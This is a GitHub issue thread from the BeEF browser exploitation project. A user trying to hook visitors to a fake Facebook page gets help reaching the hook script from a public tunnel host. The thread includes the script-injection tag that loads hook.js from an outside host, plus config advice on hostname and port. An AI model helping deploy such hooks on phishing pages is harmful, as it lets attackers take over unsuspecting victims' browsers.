### ISSUE TITLE
Hook.js is working only in LAN 

### ISSUE THREAD

**Issue by lkdevil** [beefproject/beef#1522]
Actually i can access hook.js by https://k.burrow.io/hook.js in browser but when i hooking or injecting in my fake facebook page it is not working why any idea ?

**Comment by lkdevil** [comment]
<script src="https://k.burrow.io/hook.js"> </script> 
Is correct ?

**Comment by lkdevil** [comment]
![intex aqua trend_2018-03-11-20-05-13](https://user-images.githubusercontent.com/20367238/37254710-a18883d6-2567-11e8-97de-ff82c62a6726.png)

Here is screenshot

**Comment by lkdevil** [comment]
But `src=http://127.0.0.1:3000/hook.js` is working but k.burrow.io/hook.js is also redirecting to 127.0.0.1:3000/hook.js

**Comment by bcoles** [comment]
Have you configured the public host name in `config.yaml` ?

BeEF binds to all interfaces by default, however it has no way of knowing what publicly accessible hostnames you would like to use. These need to be configured.

Here's the relevant config segment (commented out):

```yaml
        # Host Name / Domain Name
        # If you want BeEF to be accessible via hostname or domain name (ie, DynDNS),
        #   set the public hostname below:
        #public: ""      # public hostname/IP address
```

**Comment by bcoles** [comment]
Also, it looks like you're using HTTPS. The hook will fail if the HTTPS certificate it not trusted by the browser.

**Comment by lkdevil** [comment]
Kk I will try again try with http then I will give feedback

**Comment by lkdevil** [comment]
So I have to put `http://k.burrow.io` in `public` means finally it should be looks like this `public= "http://k.burrow.Jo" `
And thnx for your help :)

**Comment by lkdevil** [comment]
Not working .... I opened `http://k.burrow.io/ui/authentication` but after login I am redirecting to authentication page again and again I can't login but I can still login with 127.0.0.1:3000/ui/authentication why ?

**Comment by bcoles** [comment]
> So I have to put `http://k.burrow.io` in `public` means finally it should be looks like this `public= "http://k.burrow.Jo" `

`public` needs to be the hostname:   `public: k.burrow.io`;  then use `<script src="http://k.burrow.io/hook.js"></script>`

> Not working .... I opened `http://k.burrow.io/ui/authentication` but after login I am redirecting to authentication page again and again I can't login but I can still login with 127.0.0.1:3000/ui/authentication why ?

No idea. I haven't used burrow.io service.

**Comment by lkdevil** [comment]
And why my hook URL is now Hook URL: `http://k.burrow.io:3000/hook.js`  is it possible to remove 3000

**Comment by bcoles** [comment]
The hook URL is based on `scheme://host:port/`

If you want to change the port from `3000`, then change `port` in `config.yaml`.

**Comment by lkdevil** [comment]
Is to possible to change ` scheme://host:port/`  into `scheme://host`

**Comment by bcoles** [comment]
If you're using `http` scheme set port to `80`.

If you're using `https` scheme set port to `443`.
